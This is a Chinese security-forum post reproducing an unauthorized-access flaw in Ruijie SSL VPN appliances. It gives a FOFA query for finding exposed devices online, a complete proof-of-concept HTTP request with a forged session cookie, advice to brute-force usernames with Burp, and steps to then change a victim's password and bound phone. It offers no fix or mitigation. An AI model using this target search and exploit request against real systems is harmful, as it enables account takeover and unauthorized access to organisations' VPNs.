安全矩阵

 找回密码
 立即注册
搜索
查看: 3331|回复: 0

锐捷SSL VPN 越权访问漏洞复现

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-2 22:33:38 | 显示全部楼层 |阅读模式
原文链接:锐捷SSL VPN 越权访问漏洞复现



前言

一、漏洞描述

Ruijie SSL VPN 存在越权访问漏洞,攻击者在已知用户名的情况下,可以对账号进行修改密码和绑定手机的操作。并在未授权的情况下查看服务器资源


二、漏洞影响

Ruijie SSL VPN

三、漏洞复现

FOFA语法
  1. icon_hash="884334722" || title="Ruijie SSL VPN"
复制代码

访问目标 http://xxx.xxx.xxx.xxx/cgi-bin/installjava.cgi


POC请求包如下
  1. GET /cgi-bin/main.cgi?oper=getrsc HTTP/1.1
  2. Host: xxx.xxx.xxx.xxx
  3. Connection: close
  4. Pragma: no-cache
  5. Cache-Control: no-cache
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  9. Sec-Fetch-Site: none
  10. Sec-Fetch-Mode: navigate
  11. Sec-Fetch-User: ?1
  12. Sec-Fetch-Dest: document
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
  15. Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
复制代码
其中注意的参数为
  1. Cookie: UserName=xm; SessionId=1; FirstVist=1; Skin=1; tunnel=1
复制代码

UserName 参数为已知用户名

在未知登录用户名的情况下 漏洞无法利用(根据请求包使用Burp进行用户名爆破)

用户名正确时会返回敏感信息


通过此方法知道用户名后可以通过漏洞修改账号参数
访问 http://xxx.xxx.xxx.xxx/cgi-bin/m ... =1&oper=showres

点击个人设置跳转页面即可修改账号信息


参考文章
https://mp.weixin.qq.com/s/iRmDQJH23FJ6mL_GzXeL6g
















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 23:57 , Processed in 0.012680 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表